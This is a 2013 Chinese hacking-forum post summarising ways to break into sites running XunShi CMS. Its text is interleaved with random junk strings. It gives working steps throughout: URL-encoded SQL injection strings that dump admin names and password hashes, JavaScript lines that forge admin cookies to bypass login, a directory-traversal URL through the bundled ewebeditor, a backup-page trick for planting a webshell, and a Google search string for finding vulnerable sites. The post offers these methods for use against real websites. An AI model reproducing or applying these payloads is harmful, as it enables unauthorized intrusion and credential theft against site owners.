找回密码
 立即注册
查看: 3323|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
/ G' u6 J0 F3 x, w) m
/ y. W0 v9 R" [在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)1 C% V2 N- N; W4 _9 V2 F
$ U3 m6 ^( p0 ~2 }0 N
以下本文总结来自黑防去年第9期杂志上的内容...& V" Q: [& |  x. S
# _- G  y! [, B* @' y8 a
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%# R1 m/ {+ A2 ?  {3 o" s1 A
  \* H! F# K% T# v& m" c
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
6 t4 {7 i: L5 ~, ]7 C9 I% h2 g7 z. ~  B( S
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
3 m; O' d" a$ V" t0 L- r这里一个注入
3 S* B# ]) p& p0 J/ U, N+ s' h4 X. a& K  J
效果如图:
9 b- b7 C& I0 H; E) t2 M/ J9 q  S: {+ i
( H+ o$ Z1 g0 Q7 R  S! x

( L6 h( |) p! ~3 x" N8 {3 J  a4 Q这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
2 A- I' d# B: i& r3 Z- Y. p. D( p1 d1 }8 D7 J
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
# c1 D, S* n7 ?8 e
1 [9 |% J$ X# H/ h( C* Zjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));3 q# o2 ]1 P2 g& t$ B; X2 V
2 ]0 N  ?' w' {2 s
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
4 u& _) [& B* ?* L8 G$ v1 P2 q% z& G" e2 m* m
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞  Y" w" D7 V. t7 @/ b9 z
2 L( A+ B8 r# F
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
- N2 c, R/ _; U+ Y$ J3 e+ c. b- I- T. @, O
访问这页面来列目录..步骤如下:0 d5 z- m8 y" w, K* Y( C: W
- y5 h8 l( c4 r* y
javascript:alert(document.cookie="admindj=1") ! [+ r$ w0 N, V+ S

' W4 n* H. n3 t# Qhttp://www.political-security.co ... asp?id=46&dir=../..
' c% b5 E1 G) p% y1 i
0 f7 o( _' b, f2 @4 C$ z. |. v效果如图:
) \! x# N% D# s3 v. F* p: L7 ^: \3 T/ p

! J/ F% }0 J9 I: g6 A5 y. a7 _8 j' D0 h& G: K3 Z+ {' s* l
这样全站目录都能瞧了..找到后台目录..进去..) d# t/ {1 M9 c$ I- H- A' S
7 O0 X+ z* m  B( S
那么进了后台怎么拿shell??上传--备份就ok了..0 \  R: @, Q. r* s0 U
5 `1 |8 y0 j: Z& @3 Q% A  W/ ^
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..5 W, U) {1 `! T
. ], Q6 u( b4 k- h& Q% _* b' [- c
这个我也碰到过一次..你都可以通过列目录来实现..) C( i( z3 `) w; K1 @

6 @" i" F& F) s9 djavascript:alert(document.cookie="admindj=1") / o, e' N9 p1 t/ L. g( z$ x! t: ?
4 Y3 s$ I' M3 S, e9 }! v
http://www.political-security.co ... p?action=BackupData
8 R. z# M7 e; G: Y7 K0 K% s$ ]4 k$ t2 W. O' ^
备份ok..
3 u2 r$ ]- G3 R) [. i+ s1 Y/ l: b4 I: W
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?/ K7 e& z7 r' L! G: l  B  R
2 U, d# Z+ B6 w; v- ]& g+ q
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
7 u4 A0 S: X/ K5 B2 |7 @7 `! F2 n7 A: s6 h
然后访问此页面进行注入..步骤如下:
: V# \! _& m9 ^8 U
) f' |% }/ P' S" `8 \) Hjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
7 W5 E0 u9 D! I7 N. _9 e+ r6 \8 h8 O% s! B, x
然后请求admin/admin_chk.asp页面
. \' J$ A( ]. ?  I& W& S# {7 a9 @. j2 {0 r/ P
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
1 ]( e- a, O1 G2 U* [+ h) k4 i1 U& Y* m7 c9 R3 M" r) {/ A8 u
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
- o( n/ Y0 F+ s( t3 g) C- p+ G2 h& a: Q5 m, Q# M7 H" d+ U
效果如图所示:4 H8 h5 _) W4 m

4 J8 k6 J. ?0 u; q8 b5 @8 e& q
! ^* `4 W* \% p
! O+ @2 ]! f/ a$ P5 K, o讯时漏洞20 p+ g* h5 F( S8 j% Y' h
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)/ y4 v/ r* X3 m9 U* U$ ?, [" }
2 v+ U. P3 y, {, n. ?
1、/admin/admin_news_pl_view.asp?id=1
! A$ q6 T  b5 b3 A//id任意 填入以下语句7 }( S  R9 r6 M" F+ j% m" w/ l

6 a4 F! d2 v+ Q2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
3 s. Q- n5 d+ S0 }7 w# O- b! A
' f7 @4 o6 X) q/ F
' @% I" W% o5 i
( K% H2 E: {$ U' E* S1 i3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='# C# N, z1 F+ s2 k

( Z& v' E) E. _6 q
& m+ G& L9 X! v# I9 a) f" p
6 L: [0 Q$ p. L* |+ H( Y! F爆出管理员帐号和密码了
& }& T2 L: M$ D! U ( H3 \4 [3 h4 k) r/ m
% o! D6 L' P2 y
1 S6 @9 p' x+ G
4、cookies进后台
! Q" E7 X$ q) s: {, W- d( b % [, ~' P3 r9 m! n. Z
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
  P/ {0 W0 {( L+ t) ?" J" i3 s
0 f, `9 t- n' U& Y1 Y7 J+ w' J% s7 l2 x* |
3 M  H& s9 q( B4 V9 E4 |; E5 {
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
4 X! d5 l8 y7 X5 K, p1 y
8 H; y/ P- w$ j1 {3 N6 _  D; r/ G2 D6 t4 i, K0 b! O

" ^, l9 K9 Y. n5 m6、后台有上传和备份取SHELL不难。$ o% |: G9 C# O" Z' A; m
5 H' P) Z& B- \$ v; W( ^
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..6 P8 f8 i6 D; e% ~9 i7 f

: f# c& |3 f8 x7 N# i$ h1 Z  `) ^逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
; v: ?4 I0 a0 m8 o, w( `; l4 x* s( ^" t1 k

% ~  w& R8 t1 y1 L7 _+ t- w- D- U- U& K  K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表